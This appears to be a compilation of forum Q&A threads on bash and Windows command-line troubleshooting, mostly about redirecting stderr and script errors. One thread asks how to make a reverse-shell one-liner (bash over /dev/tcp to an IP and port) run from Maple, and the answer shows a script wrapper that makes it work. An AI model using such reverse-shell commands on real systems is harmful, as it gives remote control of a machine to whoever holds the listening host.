I am running Windows 10 and am trying to save the error output of a test.sh file to a text file.
So I created the test.sh file and wrote an unkown command in it (i.e. "blablubb").
After that I open the terminal (cmd.exe), switch to the directory and type test.sh 2>> log.txt.
Another window opens with "/usr/bin/bash --login -i \test.sh" in the title bar, shows me "bash: blablubb: command not found" and then closes immediately.
I want to save that output because the bash-window just opens for a split second. Every google search brings me to websites talking about redirecting the output and that Stream2 ist STDERR and therefore I should use test.sh 2>> log.txt or something smiliar that takes care of the STDERR stream.
If I try the same with a test.sh file and the content:
#!/bin/bash
echo hi there
I get the output in the briefly open bash-window:
bash: #!/bin/bash: No such file or directory
hi there
But the log.txt file is empty.
If I only have echo hi therein the test.sh file I get bash: echo: command not found in the bash-window.
The log.txt also empty.
If I type the following directly in the terminal, the output is written in the log.txt:
echo hi > log.txt 2>&1
If I type directly in the terminal:
echdo hi > log.txt 2>&1
I get 'Der Befehl "echdo" ist entweder falsch geschrieben oder konnte nicht gefunden werden.' in the log.txt file.
So I guess the redirecting of the output works fine until I use test.sh.
I know that .sh files are something from the unix world and that the problem might lie there but I don't know why I can not redirect the output briefly shown in the bash-console to a text file.
The 2>> redirection syntax only works if the command line containing that syntax is interpreted by bash. So it won't work from the Windows command prompt, even if the program you are running happens to be written in bash. By the time bash is running, it's too late; it gets the arguments as they were interpreted by CMD or whatever your Windows command interpreter is. (In this case, I'm guessing that means the shell script will find it has a command line argument [$1] with the value "2".)
If you open up a bash window (or just type bash in the command one) and then type the test.sh 2>>log.txt command line in that shell, it will put the error message in the file as you expect.
I think you could also do it in one step by typing bash -c "test.sh 2>>log.txt" at the Windows command prompt, but I'm not sure; Windows quoting is different than *nix quoting, and that may wind up passing literal quotation marks to bash, which won't work.
Note that CMD does have the 2>> syntax as well, and if you try to run a nonexistent windows command with 2>>errlog.txt, the "is not recognized" error message goes to the file. I think the problem comes from the fact that CMD and bash disagree on what "standard error" means, so redirecting the error output from Windows doesn't catch the error output by bash. But that's just speculation; I don't have a bash-on-Windows setup handy to test.
It would help to know if you are running Windows Subsystem for Linux (Beta). Or if you are doing something else. I'm assuming this is what you are doing on windows 10.
If this is the case are you using bash to run the script?
Are you using win-bash?
If it is win-bash I'm not very familiar and would recommend Windows Subsystem for Linux (Beta) for reasons like this. win-bash, while cool, might not be compatible with redirection operators like 2>>.
You have stdout and stderr, by default (if you don't specify) the >> (or append) will only append standard output into the txt file.
If you use 2 it will append the standard error into the txt file. Example: test.sh 2>> log.txt
This could be better described at this site.
To get exactly the command for append both stdout and stderr, go to this page.
Please tell me if this doesn't answer your question. Also, it could be more valuable to attempt a search for this answer first and explain why your search found nothing or give more extensive clarification as to what the problem is. I love answering questions and helping, but creating a new forum page for what might be an easy answer may be ineffective. I've had a bunch of fun with your question. I hope that I've helped.
That's makes a lot of sense. Thanks Mark!
Taking what mark says into account I would get Windows Subsystem for Linux (Beta). There are instructions here. Then run your script from there.
Related
A formely working bash script no longer works after switching computers. I get the following error:
No such file or directory.
Before going on, please excuse any mistakes you may find since english is not my native language.
The script was used in cygwin under Windows XP. I now had to switch to cygwin64 under Windwos 7 (64bit).
The script is used as a checkhandler for the program SMSTools3 to split a file with a specific format into multiple smaller ones, which the program then uses to send SMS to multiple recipients. The script was copied directly from the page of SMSTools3 and uses the package formail.
After looking up the error the most likely problem was that the environmantle path was not set up to look in the right path (/usr/bin). I therefore added it to the path but to no avail.
I then deleted other entries in the enviromental path of windows which contained spaces because that could have been another explanation, but again to no avail.
Following is a minimal example of the code which produces the error.
#!/bin/bash
# Sample script to allow multiple recipients in one message file.
# Define this script as a checkhandler.
echo $PATH
which formail
outgoing="/var/spool/sms/outgoing"
recipients=`formail -zx "To:" < "$1"`
I added the lines the lines echo $Path and which formail to show if the script can find the correct file. Both results look fine, the second command gives me the right output '/usr/bin/formail'
But the line recipients=... throws me the error:
No such file or directory.
I do not have much experience with bash scripting, or cygwin in general. So if someone on this wonderful board could help me solve this problem, I would be really grateful. Thank you all for your help.
EDIT:
First of all thank you all for your comments.
Secondly, I would like to apologize for the late reply. The computer in question is also used for other purposes and my problem is part of a background routine, so I have to wait for "free time" on the pc to test things.
For the things #shellter pruposed: The ls command returned an error: '': No such file or directory.
The which -a formail as well as the echo $(which -a formail) commands that #DougHenderson pruposed returned the 'right' path of /usr/bin/formail. echo \$1 = $1 before the recipent line returned the path to the checkhandler file (/usr/local/bin/smsd_checkhandler.sh), the same command after the recipent line seems to show a empty string ($1 = ). Also, the pruposed change to the recipent line did not change the error.
For the dos2unix conversion that #DennisWilliamson pruposed, I opened the file in notepad++ to use their build in converion, but it showed me that the file is in unix format with Unix style line endings.
I am running the following command from maple (the function system works just like functions such as os.system from python):
system("bash -i>& /dev/tcp/myownip/myport 0>&1 2>&1")
However, it fails and this is the output:
bash: no job control in this shell bash: &: No such file or directory
Exit Value: 127
The weird thing is that the command works great when calling it from Terminal...
Any suggestions of how I could fix this?
"No job control" means that you can't bring background jobs into the foreground when running an interactive shell.
I would focus the analysis on the wording of the second error message. We know from it that bash is running. My guess is that Maple (not knowing the meaning of the > WORD construct in bash) tokenizes the string along the white space, and then does something like execv("bash", "bash", "-i>0", "/dev/tcp/myownip/myport"). At least this would explain the error message.
Could you try the following? Create a stand-alone two-line bash script like this:
#!/usr/bin/bash
bash -i>& /dev/tcp/myownip/myport 0>&1 2>&1
Set it to executable, and then invoke it from Maple with
system("yourpath/yourscript")
At least the error message No such file or directory should be gone.
Which command in Windows command script (.cmd) accepts pipe (so, no error "The Process tried to write to a nonexistent pipe." generated), but generates no output itself, including output to StdErr? I need to not touch normal StdErr output (keep in mind, pipe transports only StdOut). I can't use null device, due to it's not installed in the system.
For example, command|rem generates mentioned error. But I want no error output, except generated by command, so rem is not suitable command for needed purpose.
Main aim is the script speed. So, don't offer extensive constructions, please.
should be break(or set/p= ?) as it is internal command prompt command (i.e. no external process started ) and generally do nothing.Though I suppose if you are searching for executable packed with the windows answer will be different.
The cd . command is what you are looking for. I used it to create empty files. This way, command | cd . works and echo Hello >&2 | cd . show "Hello" in the screen! This works as a filter that just blocks Stdout (interesting).
There are plenty of threads here discussing how to do this for scripts or for the cmdline (mostly involving pipes, redirections, tee).
What I didn't find is a solution which can be set up once and then just works globally, without manipulating single scripts or adding something to every command line.
What I want to achieve is something like described in the top answer of
How do I write stderr to a file while using "tee" with a pipe?
Isn't it possible to configure the bash session so that all stderr output is logged to a file, while still writing it to console? Something I could add to .bashrc and thus automatically set up every time I login?
Software: Bash 4.2.24(1)-release (x86_64-pc-linux-gnu), xterm, Ubuntu 12.04
Try this variation on #0xC0000022L's previous solution (put it in your .bash_profile):
exec 2> >( tee log.file > /dev/tty )
A couple of caveats:
The prompt and anything you type at the command line are printed to stderr, and so will be logged in your file.
There could be an issue with the newline that terminates a command not being displayed in your terminal; I observe it on my Linux host, but not on my Mac OS X laptop. Perhaps someone else can explain and/or fix the issue. For example, if I type "echo stdout", I see the following:
$ echo stdoutstdout
$
I'm trying to write a script that contains this
screen -S demo -d -m which should start a new screen session named demo and detach it.
Putting screen -S demo -d -m in the command line works.
If I put it in a file named boot.sh, and run it ./boot.sh I get
Error: Unknown option m
Why does this work in the command line but not as a shell script?
This file was transferred from windows and had ctrl-M characters.
Running "screen" on my Linux machine, a bad option (Screen version 4.00.03jw4 (FAU) 2-May-06) gives the error,
Error: Unknown option -z"
while your description includes no dash before the offending option. I'd check that the characters in your script file are what you expect them to be. There are many characters that look like a dash but which are not.
cat -v boot.sh
may show something interesting as it'll show codes for non-ascii characters.
This may seem a little like the "make sure your printer is plugged in" kind of help, but anyway:
have you tried to check if the screen you're invoking from the script is the same as the one invoked from the command line ?
I'm thinking you may change the PATH variable inside your script somewhere and perhaps screen from the script would be something else (a different version, perhaps ?).